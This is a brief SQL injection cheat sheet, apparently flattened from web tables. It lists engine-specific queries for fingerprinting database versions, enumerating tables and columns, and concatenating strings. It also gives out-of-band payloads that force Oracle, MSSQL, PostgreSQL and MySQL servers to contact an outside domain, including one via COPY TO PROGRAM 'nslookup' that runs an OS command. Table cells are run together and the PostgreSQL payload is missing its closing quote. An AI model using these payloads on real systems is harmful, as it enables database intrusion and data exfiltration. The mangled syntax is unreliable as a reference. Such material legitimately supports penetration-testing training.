Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.
Database Version Info
Oracle SELECT banner FROM v$version SELECT version FROM v$instanceMicrosoft SELECT @@versionPostgreSQL SELECT version()MySQL SELECT @@version
Listing tables and the columns they contain:
Database Contents Info
Oracle SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'Microsoft SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'PostgreSQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'MySQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
Database Concatenation
Oracle 'a'||'b' Microsoft 'a'+'b' PostgreSQL 'a'||'b' MySQL 'a' 'b' (space) or CONCAT('a','b')
Database Lookup Syntax
Oracle SELECT UTL_INADDR.get_host_address('domain') - requires elevated privilegesMicrosoft exec master..xp_dirtree '//domain/a'PostgreSQL copy (SELECT '') to program 'nslookup domainMySQL These work only on Windows LOAD_FILE('\\\\domain\\a') SELECT ... INTO OUTFILE '\\\\domain\a'